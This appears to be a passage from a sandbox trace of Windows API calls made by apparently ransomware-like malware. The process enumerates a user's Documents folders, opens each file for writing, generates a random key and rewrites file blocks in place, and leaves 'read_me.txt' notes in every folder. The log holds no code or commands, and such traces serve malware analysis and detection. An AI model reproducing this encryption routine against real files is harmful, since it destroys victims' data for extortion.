0x280000 [0074.367] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc4668 | out: hHeap=0x280000) returned 1 [0074.367] GetProcessHeap () returned 0x280000 [0074.367] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0074.367] GetProcessHeap () returned 0x280000 [0074.367] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0074.367] CloseHandle (hObject=0x76c) returned 1 [0074.763] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 5 [0074.763] GetProcessHeap () returned 0x280000 [0074.763] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8cb30c0 [0074.763] wnsprintfW (in: pszDest=0x8cb30c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\*") returned 81 [0074.763] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9eb95340, ftCreationTime.dwHighDateTime=0x1d4cccb, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.763] wnsprintfW (in: pszDest=0x8cb30c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\.") returned 81 [0074.763] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9eb95340, ftCreationTime.dwHighDateTime=0x1d4cccb, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0074.763] wnsprintfW (in: pszDest=0x8cb30c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\..") returned 82 [0074.763] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f1e47e0, ftCreationTime.dwHighDateTime=0x1d4c7ef, ftLastAccessTime.dwLowDateTime=0xe7cbd0d0, ftLastAccessTime.dwHighDateTime=0x1d4d4aa, ftLastWriteTime.dwLowDateTime=0xe7cbd0d0, ftLastWriteTime.dwHighDateTime=0x1d4d4aa, nFileSizeHigh=0x0, nFileSizeLow=0xd63, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="gG66GY.rtf", cAlternateFileName="")) returned 1 [0074.763] wnsprintfW (in: pszDest=0x8cb30c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\gG66GY.rtf") returned 90 [0074.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\gG66GY.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\vyjhhpzcyel8aytj2\\gg66gy.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8ec [0074.763] QueueUserWorkItem (Function=0x404e00, Context=0x8ec, Flags=0x0) returned 1 [0074.763] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f58660, ftCreationTime.dwHighDateTime=0x1d4cdc3, ftLastAccessTime.dwLowDateTime=0x4e5ce070, ftLastAccessTime.dwHighDateTime=0x1d4cd7e, ftLastWriteTime.dwLowDateTime=0x4e5ce070, ftLastWriteTime.dwHighDateTime=0x1d4cd7e, nFileSizeHigh=0x0, nFileSizeLow=0x17873, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="iVy M4WHCb-KrZtBS7qn.ppt", cAlternateFileName="IVYM4W~1.PPT")) returned 1 [0074.763] wnsprintfW (in: pszDest=0x8cb30c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\iVy M4WHCb-KrZtBS7qn.ppt") returned 104 [0074.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\iVy M4WHCb-KrZtBS7qn.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\vyjhhpzcyel8aytj2\\ivy m4whcb-krztbs7qn.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f0 [0074.764] QueueUserWorkItem (Function=0x404e00, Context=0x8f0, Flags=0x0) returned 1 [0074.764] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7f0dae0, ftCreationTime.dwHighDateTime=0x1d4cd03, ftLastAccessTime.dwLowDateTime=0x3a21ab50, ftLastAccessTime.dwHighDateTime=0x1d4cda5, ftLastWriteTime.dwLowDateTime=0x3a21ab50, ftLastWriteTime.dwHighDateTime=0x1d4cda5, nFileSizeHigh=0x0, nFileSizeLow=0x3dc9, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="JGTWbPU.csv", cAlternateFileName="")) returned 1 [0074.764] wnsprintfW (in: pszDest=0x8cb30c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\JGTWbPU.csv") returned 91 [0074.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\JGTWbPU.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\vyjhhpzcyel8aytj2\\jgtwbpu.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f4 [0074.764] QueueUserWorkItem (Function=0x404e00, Context=0x8f4, Flags=0x0) returned 1 [0074.764] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69b64b80, ftCreationTime.dwHighDateTime=0x1d4d29d, ftLastAccessTime.dwLowDateTime=0xf3163dd0, ftLastAccessTime.dwHighDateTime=0x1d4c835, ftLastWriteTime.dwLowDateTime=0xf3163dd0, ftLastWriteTime.dwHighDateTime=0x1d4c835, nFileSizeHigh=0x0, nFileSizeLow=0x3364, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="q8VRL 52.ods", cAlternateFileName="Q8VRL5~1.ODS")) returned 1 [0074.764] wnsprintfW (in: pszDest=0x8cb30c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\q8VRL 52.ods") returned 92 [0074.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\q8VRL 52.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\vyjhhpzcyel8aytj2\\q8vrl 52.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f8 [0074.764] QueueUserWorkItem (Function=0x404e00, Context=0x8f8, Flags=0x0) returned 1 [0074.764] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b33310, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.764] wnsprintfW (in: pszDest=0x8cb30c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\read_me.txt") returned 91 [0074.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\vyjhhpzcyel8aytj2\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x908 [0074.764] GetProcessHeap () returned 0x280000 [0074.764] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ab00b8 [0074.764] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*") returned 54 [0074.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b33310, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0074.765] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\read_me.txt") returned 64 [0074.765] GetProcessHeap () returned 0x280000 [0074.765] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ab00b8 | out: hHeap=0x280000) returned 1 [0074.765] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 53 [0074.765] GetProcessHeap () returned 0x280000 [0074.765] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b60028 | out: hHeap=0x280000) returned 1 [0074.765] GetProcessHeap () returned 0x280000 [0074.765] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b60028 [0074.765] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*") returned 57 [0074.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b33310, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0074.765] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\read_me.txt") returned 67 [0074.765] GetProcessHeap () returned 0x280000 [0074.765] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b60028 | out: hHeap=0x280000) returned 1 [0074.765] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 54 [0074.765] GetProcessHeap () returned 0x280000 [0074.765] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b80038 | out: hHeap=0x280000) returned 1 [0074.765] GetProcessHeap () returned 0x280000 [0074.765] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b60028 [0074.765] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*") returned 55 [0074.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x16b7f5d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b7f5d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.765] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\.") returned 55 [0074.765] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x16b7f5d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b7f5d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0074.765] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\..") returned 56 [0074.765] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.766] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0074.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0074.826] QueueUserWorkItem (Function=0x404e00, Context=0x7b0, Flags=0x0) returned 1 [0074.826] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b7f5d0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b7f5d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b7f5d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.826] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\read_me.txt") returned 65 [0074.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0074.867] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.868] ReadFile (in: hFile=0x778, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.868] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.868] GetProcessHeap () returned 0x280000 [0074.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0074.868] GetProcessHeap () returned 0x280000 [0074.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0074.868] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0074.868] GetProcessHeap () returned 0x280000 [0074.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0074.868] ReadFile (in: hFile=0x778, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0074.929] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.930] WriteFile (in: hFile=0x778, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.930] GetProcessHeap () returned 0x280000 [0074.930] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.930] GetProcessHeap () returned 0x280000 [0074.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.931] GetProcessHeap () returned 0x280000 [0074.931] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 